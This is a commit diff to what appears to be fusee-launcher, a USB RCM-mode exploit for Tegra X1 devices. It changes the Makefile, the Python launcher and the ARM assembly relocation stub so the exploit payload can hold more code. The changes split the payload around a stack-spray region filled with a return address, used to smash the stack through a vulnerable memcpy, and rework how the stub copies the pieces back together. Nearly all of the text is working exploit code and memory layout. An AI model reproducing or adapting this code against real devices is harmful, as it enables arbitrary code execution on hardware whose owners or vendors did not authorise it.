Restruct the payload, so it can fit more code

Makefile

@@ -25,27 +25,33 @@ LDFLAGS =
 
 all: intermezzo.bin
 
-# The start of the BPMP IRAM.
-START_OF_IRAM := 0x40000000
+# The new address of the Intermezzo after copy
+INTERMEZZO_RELOCATED_ADDRESS := 0x4000F000
 
 # The address to which Intermezzo is to be loaded by the payload launcher.
-INTERMEZZO_ADDRESS := 0x4001F000
+INTERMEZZO_ADDRESS := 0x40010000
 
 # The address we want the final payload to be located at.
 RELOCATION_TARGET  := 0x40010000
 
 # The addrss and length of the data loaded by f-g.
-LOAD_BLOCK_START   := 0x40020000
-LOAD_BLOCK_LENGTH  := 0x20000
+PAYLOAD_START_ADDR  := 0x40010E40
+STACK_SPRAY_START   := 0x40014E40
+STACK_SPRAY_END     := 0x40017000
+BEFORE_SPRAY_LENGTH := $(shell echo $$(( $(STACK_SPRAY_START) - $(PAYLOAD_START_ADDR) )))
+AFTER_SPRAY_LENGTH  := 0x30000
 
 ENTRY_POINT_ADDRESS := 0x40010000
 
 # Provide the definitions used in the intermezzo stub.
 DEFINES := \
-	-DSTART_OF_IRAM=$(START_OF_IRAM) \
+	-DINTERMEZZO_RELOCATED_ADDRESS=$(INTERMEZZO_RELOCATED_ADDRESS) \
 	-DRELOCATION_TARGET=$(RELOCATION_TARGET) \
-	-DLOAD_BLOCK_START=$(LOAD_BLOCK_START) \
-	-DLOAD_BLOCK_LENGTH=$(LOAD_BLOCK_LENGTH) \
+	-DPAYLOAD_START_ADDR=$(PAYLOAD_START_ADDR) \
+	-DSTACK_SPRAY_START=$(STACK_SPRAY_START) \
+	-DSTACK_SPRAY_END=$(STACK_SPRAY_END) \
+	-DBEFORE_SPRAY_LENGTH=$(BEFORE_SPRAY_LENGTH) \
+	-DAFTER_SPRAY_LENGTH=$(AFTER_SPRAY_LENGTH) \
 	-DENTRY_POINT_ADDRESS=$(ENTRY_POINT_ADDRESS)
 
 intermezzo.elf: intermezzo.o

fusee-launcher.py

@@ -32,8 +32,9 @@ import platform
 
 # specify the locations of important load components
 RCM_PAYLOAD_ADDR    = 0x40010000
-INTERMEZZO_LOCATION = 0x4001F000
-PAYLOAD_LOAD_BLOCK  = 0x40020000
+PAYLOAD_START_ADDR  = 0x40010E40
+STACK_SPRAY_START   = 0x40014E40
+STACK_SPRAY_END     = 0x40017000
 
 # notes:
 # GET_CONFIGURATION to the DEVICE triggers memcpy from 0x40003982
@@ -445,9 +446,6 @@ payload += b'\0' * (680 - len(payload))
 # Populate from [RCM_PAYLOAD_ADDR, INTERMEZZO_LOCATION) with the payload address.
 # We'll use this data to smash the stack when we execute the vulnerable memcpy.
 print("\nSetting ourselves up to smash the stack...")
-repeat_count = int((INTERMEZZO_LOCATION - RCM_PAYLOAD_ADDR) / 4)
-intermezzo_location_raw = INTERMEZZO_LOCATION.to_bytes(4, byteorder='little')
-payload += (intermezzo_location_raw * repeat_count)
 
 # Include the Intermezzo binary in the command stream. This is our first-stage
 # payload, and it's responsible for relocating the final payload to 0x40010000.
@@ -458,15 +456,25 @@ with open(intermezzo_path, "rb") as f:
     payload        += intermezzo
 
 
-# Finally, pad until we've reached the position we need to put the payload.
-# This ensures the payload winds up at the location Intermezzo expects.
-position = INTERMEZZO_LOCATION + intermezzo_size
-padding_size = PAYLOAD_LOAD_BLOCK - position
+# Pad the payload till the start of the payload
+padding_size   = PAYLOAD_START_ADDR - (RCM_PAYLOAD_ADDR + intermezzo_size)
 payload += (b'\0' * padding_size)
 
-# Read the payload into memory.
+target_payload = b''
+# Read the rest of the payload into memory.
 with open(payload_path, "rb") as f:
-    payload += f.read()
+    target_payload = f.read()
+
+# First part of the payload
+padding_size   = STACK_SPRAY_START - PAYLOAD_START_ADDR
+payload += target_payload[:padding_size]
+
+# Gap in the payload, stack spray
+repeat_count = int((STACK_SPRAY_END - STACK_SPRAY_START) / 4)
+payload += (RCM_PAYLOAD_ADDR.to_bytes(4, byteorder='little') * repeat_count)
+
+# Read the rest of the payload into memory.
+payload += target_payload[padding_size:]
 
 # Pad the payload to fill a USB request exactly, so we don't send a short
 # packet and break out of the RCM loop.

intermezzo.S

@@ -8,15 +8,15 @@
 _start:
 
     // First, we'll need to move ourselves _out_ of the target area.
-    // We'll copy down into the start of the IRAM.
-    ldr r0, =START_OF_IRAM
+    // We'll copy down into the IRAM.
+    ldr r0, =INTERMEZZO_RELOCATED_ADDRESS
     ldr r1, =post_relocation
     ldr r2, =intermezzo_end
     sub r2, r2, r1
     bl  copy
 
     // Jump to the start of RAM, which should now contain the post-relocation code.
-    ldr r0, =START_OF_IRAM
+    ldr r0, =INTERMEZZO_RELOCATED_ADDRESS
     bx  r0
 
 
@@ -25,8 +25,15 @@ post_relocation:
 
     // Next, we'll copy our payload down to the appropriate relocaiton address.
     ldr r0, =RELOCATION_TARGET
-    ldr r1, =LOAD_BLOCK_START
-    ldr r2, =LOAD_BLOCK_LENGTH
+    ldr r1, =PAYLOAD_START_ADDR
+    ldr r2, =BEFORE_SPRAY_LENGTH
+    bl  copy
+
+    ldr r0, =RELOCATION_TARGET
+    ldr r1, =BEFORE_SPRAY_LENGTH
+    add r0, r0, r1
+    ldr r1, =STACK_SPRAY_END
+    ldr r2, =AFTER_SPRAY_LENGTH
     bl  copy
 
     // Finally, jump into the relocated target.